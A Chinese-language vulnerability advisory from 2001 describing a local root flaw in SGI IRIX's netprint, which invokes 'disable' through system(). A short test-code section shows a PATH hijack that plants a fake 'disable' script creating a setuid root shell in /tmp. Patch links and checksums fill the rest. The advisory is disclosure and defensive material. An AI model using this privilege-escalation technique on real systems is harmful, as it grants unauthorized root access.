IRIX netprint DSO 存在漏洞发布时间:2001-07-26 更新时间:2001-07-26 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 IRIX 3.x unknown Note 1详细描述 /usr/lib/print/netprint 默认安装在所有SGI IRIX系统中, 其中存在一个漏洞可以通过开放的Lp帐户来获得ROOT权利。 问题是netprint程序通过system()来调用"disable"命令。 测试代码 % cat > /tmp/disable cp /bin/sh /tmp/lpshell chmod 4755 /tmp/lpshell ^D % set path=(. $path) % netprint -n blah -h blah -p blah 1-234 % /tmp/lpshell 解决方案 下载补丁: http://support.sgi.com/irix/ 和 ftp://patches.sgi.com/support/patchset/ ##### Patch File Checksums #### The actual patch will be a tar file containing the following files: Filename: README.patch.4310 Algorithm #1 (sum -r): 15520 8 README.patch.4310 Algorithm #2 (sum): 29352 8 README.patch.4310 MD5 checksum: CA53410D76FD4BE978A04DF4C1FC9DCA Filename: patchSG0004310 Algorithm #1 (sum -r): 42076 2 patchSG0004310 Algorithm #2 (sum): 36286 2 patchSG0004310 MD5 checksum: ED4F415E8D3341560680E3B5BAC5AEEF Filename: patchSG0004310.idb Algorithm #1 (sum -r): 50455 1 patchSG0004310.idb Algorithm #2 (sum): 37083 1 patchSG0004310.idb MD5 checksum: B41D14724D6E125C4D2963C3AB06D758 Filename: patchSG0004310.print_sw Algorithm #1 (sum -r): 29531 24 patchSG0004310.print_sw Algorithm #2 (sum): 9251 24 patchSG0004310.print_sw MD5 checksum: 47BDF1195787C13C11654D30708BB2A0 Filename: README.patch.4311 Algorithm #1 (sum -r): 65116 8 README.patch.4311 Algorithm #2 (sum): 29192 8 README.patch.4311 MD5 checksum: 8E4D6CD82A996CC94E24F3ED458EA6FD Filename: patchSG0004311 Algorithm #1 (sum -r): 29883 2 patchSG0004311 Algorithm #2 (sum): 37557 2 patchSG0004311 MD5 checksum: A0FB9860D3C41ADB1D3979A64E358DFB Filename: patchSG0004311.idb Algorithm #1 (sum -r): 62316 1 patchSG0004311.idb Algorithm #2 (sum): 37115 1 patchSG0004311.idb MD5 checksum: DC6FDD6DD7B5A0F0404AC8CB5EB91783 Filename: patchSG0004311.print_sw Algorithm #1 (sum -r): 41881 24 patchSG0004311.print_sw Algorithm #2 (sum): 7152 24 patchSG0004311.print_sw MD5 checksum: BC2A92B11A049ADC04984E6967973A9A 相关信息 |
